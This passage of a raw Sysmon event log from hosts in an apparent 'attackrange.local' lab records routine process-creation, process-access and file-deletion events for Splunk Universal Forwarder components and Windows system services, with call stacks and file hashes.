Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104065Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.593{58E9C193-B317-615A-E301-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104064Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.030{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31D0C82FD5B396391479291AF9290913,SHA256=3A36C474428ADB773817D17CB2C4355F52DB06EA98276058E06B4A41BC4C7CC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104063Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.030{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5575F8377D3316F67A66DF3FC29B2DD8,SHA256=C7CEC445BF3B6AA9817C1EF92257ED368B11BAE5B7E7DF9796C5D79CDCE0B783,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081995Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B316-615A-5D01-00000000FD01}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081994Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081993Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081992Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081991Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081990Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081989Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081988Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081987Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081986Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081985Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B316-615A-5D01-00000000FD01}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081984Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.998{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B316-615A-5D01-00000000FD01}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081983Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.999{2FDD8D40-B316-615A-5D01-00000000FD01}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104090Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.983{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104089Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.983{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104088Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.983{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104087Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.686{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9472C58ED0BE09D7B554EFE6D0E859D4,SHA256=0B511E4F9B5E0DC8934CAA21C68DE3D40B4E4A294C1BA2B8E567EA07757874B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081999Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:00.358{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E41EC106EC7DDB480629573FAF6977A,SHA256=22F1609DC1BE1FBD8948896E43B4E068D6275BE44B696BAD0FD867DF153E9D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104086Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31D0C82FD5B396391479291AF9290913,SHA256=3A36C474428ADB773817D17CB2C4355F52DB06EA98276058E06B4A41BC4C7CC9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104085Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.514{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B318-615A-E401-00000000FC01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104084Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104083Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104082Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104081Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104080Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.514{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B318-615A-E401-00000000FC01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104079Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.514{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B318-615A-E401-00000000FC01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 